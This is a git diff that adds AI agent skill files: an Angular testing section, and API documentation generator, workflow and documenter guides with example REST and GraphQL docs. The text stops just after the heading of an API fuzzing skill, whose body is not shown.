import { CounterComponent } from "./counter.component";
|
||||
|
||||
describe("CounterComponent", () => {
|
||||
let component: CounterComponent;
|
||||
let fixture: ComponentFixture<CounterComponent>;
|
||||
|
||||
beforeEach(async () => {
|
||||
await TestBed.configureTestingModule({
|
||||
imports: [CounterComponent], // Standalone import
|
||||
}).compileComponents();
|
||||
|
||||
fixture = TestBed.createComponent(CounterComponent);
|
||||
component = fixture.componentInstance;
|
||||
fixture.detectChanges();
|
||||
});
|
||||
|
||||
it("should increment count", () => {
|
||||
expect(component.count()).toBe(0);
|
||||
|
||||
component.increment();
|
||||
|
||||
expect(component.count()).toBe(1);
|
||||
});
|
||||
|
||||
it("should update DOM on signal change", () => {
|
||||
component.count.set(5);
|
||||
fixture.detectChanges();
|
||||
|
||||
const el = fixture.nativeElement.querySelector(".count");
|
||||
expect(el.textContent).toContain("5");
|
||||
});
|
||||
});
|
||||
```
|
||||
|
||||
### Testing with Signal Inputs
|
||||
|
||||
```typescript
|
||||
import { ComponentFixture, TestBed } from "@angular/core/testing";
|
||||
import { ComponentRef } from "@angular/core";
|
||||
import { UserCardComponent } from "./user-card.component";
|
||||
|
||||
describe("UserCardComponent", () => {
|
||||
let fixture: ComponentFixture<UserCardComponent>;
|
||||
let componentRef: ComponentRef<UserCardComponent>;
|
||||
|
||||
beforeEach(async () => {
|
||||
await TestBed.configureTestingModule({
|
||||
imports: [UserCardComponent],
|
||||
}).compileComponents();
|
||||
|
||||
fixture = TestBed.createComponent(UserCardComponent);
|
||||
componentRef = fixture.componentRef;
|
||||
|
||||
// Set signal inputs via setInput
|
||||
componentRef.setInput("id", "123");
|
||||
componentRef.setInput("name", "John Doe");
|
||||
|
||||
fixture.detectChanges();
|
||||
});
|
||||
|
||||
it("should display user name", () => {
|
||||
const el = fixture.nativeElement.querySelector("h3");
|
||||
expect(el.textContent).toContain("John Doe");
|
||||
});
|
||||
});
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Best Practices Summary
|
||||
|
||||
| Pattern | ✅ Do | ❌ Don't |
|
||||
| -------------------- | ------------------------------ | ------------------------------- |
|
||||
| **State** | Use Signals for local state | Overuse RxJS for simple state |
|
||||
| **Components** | Standalone with direct imports | Bloated SharedModules |
|
||||
| **Change Detection** | OnPush + Signals | Default CD everywhere |
|
||||
| **Lazy Loading** | `@defer` and `loadComponent` | Eager load everything |
|
||||
| **DI** | `inject()` function | Constructor injection (verbose) |
|
||||
| **Inputs** | `input()` signal function | `@Input()` decorator (legacy) |
|
||||
| **Zoneless** | Enable for new projects | Force on legacy without testing |
|
||||
|
||||
---
|
||||
|
||||
## Resources
|
||||
|
||||
- [Angular.dev Documentation](https://angular.dev)
|
||||
- [Angular Signals Guide](https://angular.dev/guide/signals)
|
||||
- [Angular SSR Guide](https://angular.dev/guide/ssr)
|
||||
- [Angular Update Guide](https://angular.dev/update-guide)
|
||||
- [Angular Blog](https://blog.angular.dev)
|
||||
|
||||
---
|
||||
|
||||
## Common Troubleshooting
|
||||
|
||||
| Issue | Solution |
|
||||
| ------------------------------ | --------------------------------------------------- |
|
||||
| Signal not updating UI | Ensure `OnPush` + call signal as function `count()` |
|
||||
| Hydration mismatch | Check server/client content consistency |
|
||||
| Circular dependency | Use `inject()` with `forwardRef` |
|
||||
| Zoneless not detecting changes | Trigger via signal updates, not mutations |
|
||||
| SSR fetch fails | Use `TransferState` or `withFetch()` |
|
||||
14
packages/llm/skills/angular/metadata.json
Normal file
14
packages/llm/skills/angular/metadata.json
Normal file
@ -0,0 +1,14 @@
|
||||
{
|
||||
"version": "1.0.0",
|
||||
"organization": "Antigravity Awesome Skills",
|
||||
"date": "February 2026",
|
||||
"abstract": "Comprehensive guide to modern Angular development (v20+) designed for AI agents and LLMs. Covers Signals, Standalone Components, Zoneless applications, SSR/Hydration, reactive patterns, routing, dependency injection, and modern forms. Emphasizes component-driven architecture with practical examples and migration strategies for modernizing existing codebases.",
|
||||
"references": [
|
||||
"https://angular.dev",
|
||||
"https://angular.dev/guide/signals",
|
||||
"https://angular.dev/guide/zoneless",
|
||||
"https://angular.dev/guide/ssr",
|
||||
"https://angular.dev/guide/standalone-components",
|
||||
"https://angular.dev/guide/defer"
|
||||
]
|
||||
}
|
||||
487
packages/llm/skills/api-documentation-generator/SKILL.md
Normal file
487
packages/llm/skills/api-documentation-generator/SKILL.md
Normal file
@ -0,0 +1,487 @@
|
||||
---
|
||||
name: api-documentation-generator
|
||||
description: "Generate comprehensive, developer-friendly API documentation from code, including endpoints, parameters, examples, and best practices"
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# API Documentation Generator
|
||||
|
||||
## Overview
|
||||
|
||||
Automatically generate clear, comprehensive API documentation from your codebase. This skill helps you create professional documentation that includes endpoint descriptions, request/response examples, authentication details, error handling, and usage guidelines.
|
||||
|
||||
Perfect for REST APIs, GraphQL APIs, and WebSocket APIs.
|
||||
|
||||
## When to Use This Skill
|
||||
|
||||
- Use when you need to document a new API
|
||||
- Use when updating existing API documentation
|
||||
- Use when your API lacks clear documentation
|
||||
- Use when onboarding new developers to your API
|
||||
- Use when preparing API documentation for external users
|
||||
- Use when creating OpenAPI/Swagger specifications
|
||||
|
||||
## How It Works
|
||||
|
||||
### Step 1: Analyze the API Structure
|
||||
|
||||
First, I'll examine your API codebase to understand:
|
||||
- Available endpoints and routes
|
||||
- HTTP methods (GET, POST, PUT, DELETE, etc.)
|
||||
- Request parameters and body structure
|
||||
- Response formats and status codes
|
||||
- Authentication and authorization requirements
|
||||
- Error handling patterns
|
||||
|
||||
### Step 2: Generate Endpoint Documentation
|
||||
|
||||
For each endpoint, I'll create documentation including:
|
||||
|
||||
**Endpoint Details:**
|
||||
- HTTP method and URL path
|
||||
- Brief description of what it does
|
||||
- Authentication requirements
|
||||
- Rate limiting information (if applicable)
|
||||
|
||||
**Request Specification:**
|
||||
- Path parameters
|
||||
- Query parameters
|
||||
- Request headers
|
||||
- Request body schema (with types and validation rules)
|
||||
|
||||
**Response Specification:**
|
||||
- Success response (status code + body structure)
|
||||
- Error responses (all possible error codes)
|
||||
- Response headers
|
||||
|
||||
**Code Examples:**
|
||||
- cURL command
|
||||
- JavaScript/TypeScript (fetch/axios)
|
||||
- Python (requests)
|
||||
- Other languages as needed
|
||||
|
||||
### Step 3: Add Usage Guidelines
|
||||
|
||||
I'll include:
|
||||
- Getting started guide
|
||||
- Authentication setup
|
||||
- Common use cases
|
||||
- Best practices
|
||||
- Rate limiting details
|
||||
- Pagination patterns
|
||||
- Filtering and sorting options
|
||||
|
||||
### Step 4: Document Error Handling
|
||||
|
||||
Clear error documentation including:
|
||||
- All possible error codes
|
||||
- Error message formats
|
||||
- Troubleshooting guide
|
||||
- Common error scenarios and solutions
|
||||
|
||||
### Step 5: Create Interactive Examples
|
||||
|
||||
Where possible, I'll provide:
|
||||
- Postman collection
|
||||
- OpenAPI/Swagger specification
|
||||
- Interactive code examples
|
||||
- Sample responses
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: REST API Endpoint Documentation
|
||||
|
||||
```markdown
|
||||
## Create User
|
||||
|
||||
Creates a new user account.
|
||||
|
||||
**Endpoint:** `POST /api/v1/users`
|
||||
|
||||
**Authentication:** Required (Bearer token)
|
||||
|
||||
**Request Body:**
|
||||
\`\`\`json
|
||||
{
|
||||
"email": "user@example.com", // Required: Valid email address
|
||||
"password": "SecurePass123!", // Required: Min 8 chars, 1 uppercase, 1 number
|
||||
"name": "John Doe", // Required: 2-50 characters
|
||||
"role": "user" // Optional: "user" or "admin" (default: "user")
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
**Success Response (201 Created):**
|
||||
\`\`\`json
|
||||
{
|
||||
"id": "usr_1234567890",
|
||||
"email": "user@example.com",
|
||||
"name": "John Doe",
|
||||
"role": "user",
|
||||
"createdAt": "2026-01-20T10:30:00Z",
|
||||
"emailVerified": false
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
**Error Responses:**
|
||||
|
||||
- `400 Bad Request` - Invalid input data
|
||||
\`\`\`json
|
||||
{
|
||||
"error": "VALIDATION_ERROR",
|
||||
"message": "Invalid email format",
|
||||
"field": "email"
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
- `409 Conflict` - Email already exists
|
||||
\`\`\`json
|
||||
{
|
||||
"error": "EMAIL_EXISTS",
|
||||
"message": "An account with this email already exists"
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
- `401 Unauthorized` - Missing or invalid authentication token
|
||||
|
||||
**Example Request (cURL):**
|
||||
\`\`\`bash
|
||||
curl -X POST https://api.example.com/api/v1/users \
|
||||
-H "Authorization: Bearer YOUR_TOKEN" \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{
|
||||
"email": "user@example.com",
|
||||
"password": "SecurePass123!",
|
||||
"name": "John Doe"
|
||||
}'
|
||||
\`\`\`
|
||||
|
||||
**Example Request (JavaScript):**
|
||||
\`\`\`javascript
|
||||
const response = await fetch('https://api.example.com/api/v1/users', {
|
||||
method: 'POST',
|
||||
headers: {
|
||||
'Authorization': `Bearer ${token}`,
|
||||
'Content-Type': 'application/json'
|
||||
},
|
||||
body: JSON.stringify({
|
||||
email: 'user@example.com',
|
||||
password: 'SecurePass123!',
|
||||
name: 'John Doe'
|
||||
})
|
||||
});
|
||||
|
||||
const user = await response.json();
|
||||
console.log(user);
|
||||
\`\`\`
|
||||
|
||||
**Example Request (Python):**
|
||||
\`\`\`python
|
||||
import requests
|
||||
|
||||
response = requests.post(
|
||||
'https://api.example.com/api/v1/users',
|
||||
headers={
|
||||
'Authorization': f'Bearer {token}',
|
||||
'Content-Type': 'application/json'
|
||||
},
|
||||
json={
|
||||
'email': 'user@example.com',
|
||||
'password': 'SecurePass123!',
|
||||
'name': 'John Doe'
|
||||
}
|
||||
)
|
||||
|
||||
user = response.json()
|
||||
print(user)
|
||||
\`\`\`
|
||||
```
|
||||
|
||||
### Example 2: GraphQL API Documentation
|
||||
|
||||
```markdown
|
||||
## User Query
|
||||
|
||||
Fetch user information by ID.
|
||||
|
||||
**Query:**
|
||||
\`\`\`graphql
|
||||
query GetUser($id: ID!) {
|
||||
user(id: $id) {
|
||||
id
|
||||
email
|
||||
name
|
||||
role
|
||||
createdAt
|
||||
posts {
|
||||
id
|
||||
title
|
||||
publishedAt
|
||||
}
|
||||
}
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
**Variables:**
|
||||
\`\`\`json
|
||||
{
|
||||
"id": "usr_1234567890"
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
**Response:**
|
||||
\`\`\`json
|
||||
{
|
||||
"data": {
|
||||
"user": {
|
||||
"id": "usr_1234567890",
|
||||
"email": "user@example.com",
|
||||
"name": "John Doe",
|
||||
"role": "user",
|
||||
"createdAt": "2026-01-20T10:30:00Z",
|
||||
"posts": [
|
||||
{
|
||||
"id": "post_123",
|
||||
"title": "My First Post",
|
||||
"publishedAt": "2026-01-21T14:00:00Z"
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
**Errors:**
|
||||
\`\`\`json
|
||||
{
|
||||
"errors": [
|
||||
{
|
||||
"message": "User not found",
|
||||
"extensions": {
|
||||
"code": "USER_NOT_FOUND",
|
||||
"userId": "usr_1234567890"
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
\`\`\`
|
||||
```
|
||||
|
||||
### Example 3: Authentication Documentation
|
||||
|
||||
```markdown
|
||||
## Authentication
|
||||
|
||||
All API requests require authentication using Bearer tokens.
|
||||
|
||||
### Getting a Token
|
||||
|
||||
**Endpoint:** `POST /api/v1/auth/login`
|
||||
|
||||
**Request:**
|
||||
\`\`\`json
|
||||
{
|
||||
"email": "user@example.com",
|
||||
"password": "your-password"
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
**Response:**
|
||||
\`\`\`json
|
||||
{
|
||||
"token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...",
|
||||
"expiresIn": 3600,
|
||||
"refreshToken": "refresh_token_here"
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
### Using the Token
|
||||
|
||||
Include the token in the Authorization header:
|
||||
|
||||
\`\`\`
|
||||
Authorization: Bearer YOUR_TOKEN
|
||||
\`\`\`
|
||||
|
||||
### Token Expiration
|
||||
|
||||
Tokens expire after 1 hour. Use the refresh token to get a new access token:
|
||||
|
||||
**Endpoint:** `POST /api/v1/auth/refresh`
|
||||
|
||||
**Request:**
|
||||
\`\`\`json
|
||||
{
|
||||
"refreshToken": "refresh_token_here"
|
||||
}
|
||||
\`\`\`
|
||||
```
|
||||
|
||||
## Best Practices
|
||||
|
||||
### ✅ Do This
|
||||
|
||||
- **Be Consistent** - Use the same format for all endpoints
|
||||
- **Include Examples** - Provide working code examples in multiple languages
|
||||
- **Document Errors** - List all possible error codes and their meanings
|
||||
- **Show Real Data** - Use realistic example data, not "foo" and "bar"
|
||||
- **Explain Parameters** - Describe what each parameter does and its constraints
|
||||
- **Version Your API** - Include version numbers in URLs (/api/v1/)
|
||||
- **Add Timestamps** - Show when documentation was last updated
|
||||
- **Link Related Endpoints** - Help users discover related functionality
|
||||
- **Include Rate Limits** - Document any rate limiting policies
|
||||
- **Provide Postman Collection** - Make it easy to test your API
|
||||
|
||||
### ❌ Don't Do This
|
||||
|
||||
- **Don't Skip Error Cases** - Users need to know what can go wrong
|
||||
- **Don't Use Vague Descriptions** - "Gets data" is not helpful
|
||||
- **Don't Forget Authentication** - Always document auth requirements
|
||||
- **Don't Ignore Edge Cases** - Document pagination, filtering, sorting
|
||||
- **Don't Leave Examples Broken** - Test all code examples
|
||||
- **Don't Use Outdated Info** - Keep documentation in sync with code
|
||||
- **Don't Overcomplicate** - Keep it simple and scannable
|
||||
- **Don't Forget Response Headers** - Document important headers
|
||||
|
||||
## Documentation Structure
|
||||
|
||||
### Recommended Sections
|
||||
|
||||
1. **Introduction**
|
||||
- What the API does
|
||||
- Base URL
|
||||
- API version
|
||||
- Support contact
|
||||
|
||||
2. **Authentication**
|
||||
- How to authenticate
|
||||
- Token management
|
||||
- Security best practices
|
||||
|
||||
3. **Quick Start**
|
||||
- Simple example to get started
|
||||
- Common use case walkthrough
|
||||
|
||||
4. **Endpoints**
|
||||
- Organized by resource
|
||||
- Full details for each endpoint
|
||||
|
||||
5. **Data Models**
|
||||
- Schema definitions
|
||||
- Field descriptions
|
||||
- Validation rules
|
||||
|
||||
6. **Error Handling**
|
||||
- Error code reference
|
||||
- Error response format
|
||||
- Troubleshooting guide
|
||||
|
||||
7. **Rate Limiting**
|
||||
- Limits and quotas
|
||||
- Headers to check
|
||||
- Handling rate limit errors
|
||||
|
||||
8. **Changelog**
|
||||
- API version history
|
||||
- Breaking changes
|
||||
- Deprecation notices
|
||||
|
||||
9. **SDKs and Tools**
|
||||
- Official client libraries
|
||||
- Postman collection
|
||||
- OpenAPI specification
|
||||
|
||||
## Common Pitfalls
|
||||
|
||||
### Problem: Documentation Gets Out of Sync
|
||||
**Symptoms:** Examples don't work, parameters are wrong, endpoints return different data
|
||||
**Solution:**
|
||||
- Generate docs from code comments/annotations
|
||||
- Use tools like Swagger/OpenAPI
|
||||
- Add API tests that validate documentation
|
||||
- Review docs with every API change
|
||||
|
||||
### Problem: Missing Error Documentation
|
||||
**Symptoms:** Users don't know how to handle errors, support tickets increase
|
||||
**Solution:**
|
||||
- Document every possible error code
|
||||
- Provide clear error messages
|
||||
- Include troubleshooting steps
|
||||
- Show example error responses
|
||||
|
||||
### Problem: Examples Don't Work
|
||||
**Symptoms:** Users can't get started, frustration increases
|
||||
**Solution:**
|
||||
- Test every code example
|
||||
- Use real, working endpoints
|
||||
- Include complete examples (not fragments)
|
||||
- Provide a sandbox environment
|
||||
|
||||
### Problem: Unclear Parameter Requirements
|
||||
**Symptoms:** Users send invalid requests, validation errors
|
||||
**Solution:**
|
||||
- Mark required vs optional clearly
|
||||
- Document data types and formats
|
||||
- Show validation rules
|
||||
- Provide example values
|
||||
|
||||
## Tools and Formats
|
||||
|
||||
### OpenAPI/Swagger
|
||||
Generate interactive documentation:
|
||||
```yaml
|
||||
openapi: 3.0.0
|
||||
info:
|
||||
title: My API
|
||||
version: 1.0.0
|
||||
paths:
|
||||
/users:
|
||||
post:
|
||||
summary: Create a new user
|
||||
requestBody:
|
||||
required: true
|
||||
content:
|
||||
application/json:
|
||||
schema:
|
||||
$ref: '#/components/schemas/CreateUserRequest'
|
||||
```
|
||||
|
||||
### Postman Collection
|
||||
Export collection for easy testing:
|
||||
```json
|
||||
{
|
||||
"info": {
|
||||
"name": "My API",
|
||||
"schema": "https://schema.getpostman.com/json/collection/v2.1.0/collection.json"
|
||||
},
|
||||
"item": [
|
||||
{
|
||||
"name": "Create User",
|
||||
"request": {
|
||||
"method": "POST",
|
||||
"url": "{{baseUrl}}/api/v1/users"
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
## Related Skills
|
||||
|
||||
- `@doc-coauthoring` - For collaborative documentation writing
|
||||
- `@copywriting` - For clear, user-friendly descriptions
|
||||
- `@test-driven-development` - For ensuring API behavior matches docs
|
||||
- `@systematic-debugging` - For troubleshooting API issues
|
||||
|
||||
## Additional Resources
|
||||
|
||||
- [OpenAPI Specification](https://swagger.io/specification/)
|
||||
- [REST API Best Practices](https://restfulapi.net/)
|
||||
- [GraphQL Documentation](https://graphql.org/learn/)
|
||||
- [API Design Patterns](https://www.apiguide.com/)
|
||||
- [Postman Documentation](https://learning.postman.com/docs/)
|
||||
|
||||
---
|
||||
|
||||
**Pro Tip:** Keep your API documentation as close to your code as possible. Use tools that generate docs from code comments to ensure they stay in sync!
|
||||
163
packages/llm/skills/api-documentation/SKILL.md
Normal file
163
packages/llm/skills/api-documentation/SKILL.md
Normal file
@ -0,0 +1,163 @@
|
||||
---
|
||||
name: api-documentation
|
||||
description: "API documentation workflow for generating OpenAPI specs, creating developer guides, and maintaining comprehensive API documentation."
|
||||
category: granular-workflow-bundle
|
||||
risk: safe
|
||||
source: personal
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# API Documentation Workflow
|
||||
|
||||
## Overview
|
||||
|
||||
Specialized workflow for creating comprehensive API documentation including OpenAPI/Swagger specs, developer guides, code examples, and interactive documentation.
|
||||
|
||||
## When to Use This Workflow
|
||||
|
||||
Use this workflow when:
|
||||
- Creating API documentation
|
||||
- Generating OpenAPI specs
|
||||
- Writing developer guides
|
||||
- Adding code examples
|
||||
- Setting up API portals
|
||||
|
||||
## Workflow Phases
|
||||
|
||||
### Phase 1: API Discovery
|
||||
|
||||
#### Skills to Invoke
|
||||
- `api-documenter` - API documentation
|
||||
- `api-design-principles` - API design
|
||||
|
||||
#### Actions
|
||||
1. Inventory endpoints
|
||||
2. Document request/response
|
||||
3. Identify authentication
|
||||
4. Map error codes
|
||||
5. Note rate limits
|
||||
|
||||
#### Copy-Paste Prompts
|
||||
```
|
||||
Use @api-documenter to discover and document API endpoints
|
||||
```
|
||||
|
||||
### Phase 2: OpenAPI Specification
|
||||
|
||||
#### Skills to Invoke
|
||||
- `openapi-spec-generation` - OpenAPI
|
||||
- `api-documenter` - API specs
|
||||
|
||||
#### Actions
|
||||
1. Create OpenAPI schema
|
||||
2. Define paths
|
||||
3. Add schemas
|
||||
4. Configure security
|
||||
5. Add examples
|
||||
|
||||
#### Copy-Paste Prompts
|
||||
```
|
||||
Use @openapi-spec-generation to create OpenAPI specification
|
||||
```
|
||||
|
||||
### Phase 3: Developer Guide
|
||||
|
||||
#### Skills to Invoke
|
||||
- `api-documentation-generator` - Documentation
|
||||
- `documentation-templates` - Templates
|
||||
|
||||
#### Actions
|
||||
1. Create getting started
|
||||
2. Write authentication guide
|
||||
3. Document common patterns
|
||||
4. Add troubleshooting
|
||||
5. Create FAQ
|
||||
|
||||
#### Copy-Paste Prompts
|
||||
```
|
||||
Use @api-documentation-generator to create developer guide
|
||||
```
|
||||
|
||||
### Phase 4: Code Examples
|
||||
|
||||
#### Skills to Invoke
|
||||
- `api-documenter` - Code examples
|
||||
- `tutorial-engineer` - Tutorials
|
||||
|
||||
#### Actions
|
||||
1. Create example requests
|
||||
2. Write SDK examples
|
||||
3. Add curl examples
|
||||
4. Create tutorials
|
||||
5. Test examples
|
||||
|
||||
#### Copy-Paste Prompts
|
||||
```
|
||||
Use @api-documenter to generate code examples
|
||||
```
|
||||
|
||||
### Phase 5: Interactive Docs
|
||||
|
||||
#### Skills to Invoke
|
||||
- `api-documenter` - Interactive docs
|
||||
|
||||
#### Actions
|
||||
1. Set up Swagger UI
|
||||
2. Configure Redoc
|
||||
3. Add try-it functionality
|
||||
4. Test interactivity
|
||||
5. Deploy docs
|
||||
|
||||
#### Copy-Paste Prompts
|
||||
```
|
||||
Use @api-documenter to set up interactive documentation
|
||||
```
|
||||
|
||||
### Phase 6: Documentation Site
|
||||
|
||||
#### Skills to Invoke
|
||||
- `docs-architect` - Documentation architecture
|
||||
- `wiki-page-writer` - Documentation
|
||||
|
||||
#### Actions
|
||||
1. Choose platform
|
||||
2. Design structure
|
||||
3. Create pages
|
||||
4. Add navigation
|
||||
5. Configure search
|
||||
|
||||
#### Copy-Paste Prompts
|
||||
```
|
||||
Use @docs-architect to design API documentation site
|
||||
```
|
||||
|
||||
### Phase 7: Maintenance
|
||||
|
||||
#### Skills to Invoke
|
||||
- `api-documenter` - Doc maintenance
|
||||
|
||||
#### Actions
|
||||
1. Set up auto-generation
|
||||
2. Configure validation
|
||||
3. Add review process
|
||||
4. Schedule updates
|
||||
5. Monitor feedback
|
||||
|
||||
#### Copy-Paste Prompts
|
||||
```
|
||||
Use @api-documenter to set up automated doc generation
|
||||
```
|
||||
|
||||
## Quality Gates
|
||||
|
||||
- [ ] OpenAPI spec complete
|
||||
- [ ] Developer guide written
|
||||
- [ ] Code examples working
|
||||
- [ ] Interactive docs functional
|
||||
- [ ] Documentation deployed
|
||||
|
||||
## Related Workflow Bundles
|
||||
|
||||
- `documentation` - Documentation
|
||||
- `api-development` - API development
|
||||
- `development` - Development
|
||||
182
packages/llm/skills/api-documenter/SKILL.md
Normal file
182
packages/llm/skills/api-documenter/SKILL.md
Normal file
@ -0,0 +1,182 @@
|
||||
---
|
||||
name: api-documenter
|
||||
description: Master API documentation with OpenAPI 3.1, AI-powered tools, and modern developer experience practices. Create interactive docs, generate SDKs, and build comprehensive developer portals.
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: '2026-02-27'
|
||||
---
|
||||
You are an expert API documentation specialist mastering modern developer experience through comprehensive, interactive, and AI-enhanced documentation.
|
||||
|
||||
## Use this skill when
|
||||
|
||||
- Creating or updating OpenAPI/AsyncAPI specifications
|
||||
- Building developer portals, SDK docs, or onboarding flows
|
||||
- Improving API documentation quality and discoverability
|
||||
- Generating code examples or SDKs from API specs
|
||||
|
||||
## Do not use this skill when
|
||||
|
||||
- You only need a quick internal note or informal summary
|
||||
- The task is pure backend implementation without docs
|
||||
- There is no API surface or spec to document
|
||||
|
||||
## Instructions
|
||||
|
||||
1. Identify target users, API scope, and documentation goals.
|
||||
2. Create or validate specifications with examples and auth flows.
|
||||
3. Build interactive docs and ensure accuracy with tests.
|
||||
4. Plan maintenance, versioning, and migration guidance.
|
||||
|
||||
## Purpose
|
||||
|
||||
Expert API documentation specialist focusing on creating world-class developer experiences through comprehensive, interactive, and accessible API documentation. Masters modern documentation tools, OpenAPI 3.1+ standards, and AI-powered documentation workflows while ensuring documentation drives API adoption and reduces developer integration time.
|
||||
|
||||
## Capabilities
|
||||
|
||||
### Modern Documentation Standards
|
||||
|
||||
- OpenAPI 3.1+ specification authoring with advanced features
|
||||
- API-first design documentation with contract-driven development
|
||||
- AsyncAPI specifications for event-driven and real-time APIs
|
||||
- GraphQL schema documentation and SDL best practices
|
||||
- JSON Schema validation and documentation integration
|
||||
- Webhook documentation with payload examples and security considerations
|
||||
- API lifecycle documentation from design to deprecation
|
||||
|
||||
### AI-Powered Documentation Tools
|
||||
|
||||
- AI-assisted content generation with tools like Mintlify and ReadMe AI
|
||||
- Automated documentation updates from code comments and annotations
|
||||
- Natural language processing for developer-friendly explanations
|
||||
- AI-powered code example generation across multiple languages
|
||||
- Intelligent content suggestions and consistency checking
|
||||
- Automated testing of documentation examples and code snippets
|
||||
- Smart content translation and localization workflows
|
||||
|
||||
### Interactive Documentation Platforms
|
||||
|
||||
- Swagger UI and Redoc customization and optimization
|
||||
- Stoplight Studio for collaborative API design and documentation
|
||||
- Insomnia and Postman collection generation and maintenance
|
||||
- Custom documentation portals with frameworks like Docusaurus
|
||||
- API Explorer interfaces with live testing capabilities
|
||||
- Try-it-now functionality with authentication handling
|
||||
- Interactive tutorials and onboarding experiences
|
||||
|
||||
### Developer Portal Architecture
|
||||
|
||||
- Comprehensive developer portal design and information architecture
|
||||
- Multi-API documentation organization and navigation
|
||||
- User authentication and API key management integration
|
||||
- Community features including forums, feedback, and support
|
||||
- Analytics and usage tracking for documentation effectiveness
|
||||
- Search optimization and discoverability enhancements
|
||||
- Mobile-responsive documentation design
|
||||
|
||||
### SDK and Code Generation
|
||||
|
||||
- Multi-language SDK generation from OpenAPI specifications
|
||||
- Code snippet generation for popular languages and frameworks
|
||||
- Client library documentation and usage examples
|
||||
- Package manager integration and distribution strategies
|
||||
- Version management for generated SDKs and libraries
|
||||
- Custom code generation templates and configurations
|
||||
- Integration with CI/CD pipelines for automated releases
|
||||
|
||||
### Authentication and Security Documentation
|
||||
|
||||
- OAuth 2.0 and OpenID Connect flow documentation
|
||||
- API key management and security best practices
|
||||
- JWT token handling and refresh mechanisms
|
||||
- Rate limiting and throttling explanations
|
||||
- Security scheme documentation with working examples
|
||||
- CORS configuration and troubleshooting guides
|
||||
- Webhook signature verification and security
|
||||
|
||||
### Testing and Validation
|
||||
|
||||
- Documentation-driven testing with contract validation
|
||||
- Automated testing of code examples and curl commands
|
||||
- Response validation against schema definitions
|
||||
- Performance testing documentation and benchmarks
|
||||
- Error simulation and troubleshooting guides
|
||||
- Mock server generation from documentation
|
||||
- Integration testing scenarios and examples
|
||||
|
||||
### Version Management and Migration
|
||||
|
||||
- API versioning strategies and documentation approaches
|
||||
- Breaking change communication and migration guides
|
||||
- Deprecation notices and timeline management
|
||||
- Changelog generation and release note automation
|
||||
- Backward compatibility documentation
|
||||
- Version-specific documentation maintenance
|
||||
- Migration tooling and automation scripts
|
||||
|
||||
### Content Strategy and Developer Experience
|
||||
|
||||
- Technical writing best practices for developer audiences
|
||||
- Information architecture and content organization
|
||||
- User journey mapping and onboarding optimization
|
||||
- Accessibility standards and inclusive design practices
|
||||
- Performance optimization for documentation sites
|
||||
- SEO optimization for developer content discovery
|
||||
- Community-driven documentation and contribution workflows
|
||||
|
||||
### Integration and Automation
|
||||
|
||||
- CI/CD pipeline integration for documentation updates
|
||||
- Git-based documentation workflows and version control
|
||||
- Automated deployment and hosting strategies
|
||||
- Integration with development tools and IDEs
|
||||
- API testing tool integration and synchronization
|
||||
- Documentation analytics and feedback collection
|
||||
- Third-party service integrations and embeds
|
||||
|
||||
## Behavioral Traits
|
||||
|
||||
- Prioritizes developer experience and time-to-first-success
|
||||
- Creates documentation that reduces support burden
|
||||
- Focuses on practical, working examples over theoretical descriptions
|
||||
- Maintains accuracy through automated testing and validation
|
||||
- Designs for discoverability and progressive disclosure
|
||||
- Builds inclusive and accessible content for diverse audiences
|
||||
- Implements feedback loops for continuous improvement
|
||||
- Balances comprehensiveness with clarity and conciseness
|
||||
- Follows docs-as-code principles for maintainability
|
||||
- Considers documentation as a product requiring user research
|
||||
|
||||
## Knowledge Base
|
||||
|
||||
- OpenAPI 3.1 specification and ecosystem tools
|
||||
- Modern documentation platforms and static site generators
|
||||
- AI-powered documentation tools and automation workflows
|
||||
- Developer portal best practices and information architecture
|
||||
- Technical writing principles and style guides
|
||||
- API design patterns and documentation standards
|
||||
- Authentication protocols and security documentation
|
||||
- Multi-language SDK generation and distribution
|
||||
- Documentation testing frameworks and validation tools
|
||||
- Analytics and user research methodologies for documentation
|
||||
|
||||
## Response Approach
|
||||
|
||||
1. **Assess documentation needs** and target developer personas
|
||||
2. **Design information architecture** with progressive disclosure
|
||||
3. **Create comprehensive specifications** with validation and examples
|
||||
4. **Build interactive experiences** with try-it-now functionality
|
||||
5. **Generate working code examples** across multiple languages
|
||||
6. **Implement testing and validation** for accuracy and reliability
|
||||
7. **Optimize for discoverability** and search engine visibility
|
||||
8. **Plan for maintenance** and automated updates
|
||||
|
||||
## Example Interactions
|
||||
|
||||
- "Create a comprehensive OpenAPI 3.1 specification for this REST API with authentication examples"
|
||||
- "Build an interactive developer portal with multi-API documentation and user onboarding"
|
||||
- "Generate SDKs in Python, JavaScript, and Go from this OpenAPI spec"
|
||||
- "Design a migration guide for developers upgrading from API v1 to v2"
|
||||
- "Create webhook documentation with security best practices and payload examples"
|
||||
- "Build automated testing for all code examples in our API documentation"
|
||||
- "Design an API explorer interface with live testing and authentication"
|
||||
- "Create comprehensive error documentation with troubleshooting guides"
|
||||
436
packages/llm/skills/api-fuzzing-bug-bounty/SKILL.md
Normal file
436
packages/llm/skills/api-fuzzing-bug-bounty/SKILL.md
Normal file
@ -0,0 +1,436 @@
|
||||
---
|
||||
name: api-fuzzing-bug-bounty
|
||||
description: "This skill should be used when the user asks to \"test API security\", \"fuzz APIs\", \"find IDOR vulnerabilities\", \"test REST API\", \"test GraphQL\", \"API penetration testing\", \"bug b..."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# API Fuzzing for Bug Bounty
|
||||
|
||||
## Purpose
|
||||
|
||||
